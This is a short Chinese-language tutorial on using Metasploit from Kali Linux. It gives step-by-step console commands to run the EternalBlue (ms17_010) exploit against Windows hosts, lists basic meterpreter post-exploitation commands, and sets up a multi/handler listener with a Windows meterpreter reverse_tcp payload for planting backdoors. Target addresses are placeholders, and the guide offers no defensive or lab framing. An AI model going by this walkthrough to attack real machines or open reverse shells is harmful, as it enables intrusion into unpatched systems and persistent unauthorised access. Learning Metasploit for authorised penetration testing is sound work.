一、介绍
Metasploit是利用和测试安全漏洞的开源工具,集成了各种平台上的常见溢出漏洞和Shellcode。
二、使用流程
1.使用root账户进入kali终端
sudo su
2.进入Metasploit面板
msfconsole
三、简单使用
(一)利用永恒之蓝漏洞攻击Windows操作系统
2017年之前的Windows系统基本都存在永恒之蓝漏洞,但过于老旧的系统如XP等不存在此漏洞
1.搜索模块
search ms17_010
2.使用模块
use exploit/windows/smb/ms17_010_eternalblue
exploit/… 为攻击所利用的脚本,作用是进行漏洞攻击
auxiliary/… 为辅助检测脚本,作用是检测漏洞是否存在
3.查看攻击必选项
show options
4.将Required显示为yes的必选项参数进行添加
如:设置攻击对象IP等
set RHOST xxx.xxx.xxx.xxx
5.开始攻击
run
6.检查攻击完成情况
若显示win,则完成攻击
(二)metasploit的后渗透模块–meterpreter
介绍
meterpreter是metasploit的后渗透工具
简单使用
1.查看帮助
help
2.进入后台
background
3.退出
exit
(三)handler模块
本模块常用于配合meterpreter工具进行后门植入时,用作监听用途
简单使用
1.使用模块
use exploit/multi/handler
2.查看必选项
show options
3.设置必选项
通常需要设置三个必选项
set payload windows/x64/meterpreter/reverse_tcp
set lhost=xxx.xxx.xxx.xxx
set lport=x
若同时要用msfvenom工具时,该handler模块的这三个必选项必须要与msfvenom设置的保持一致
4.运行handler程序
run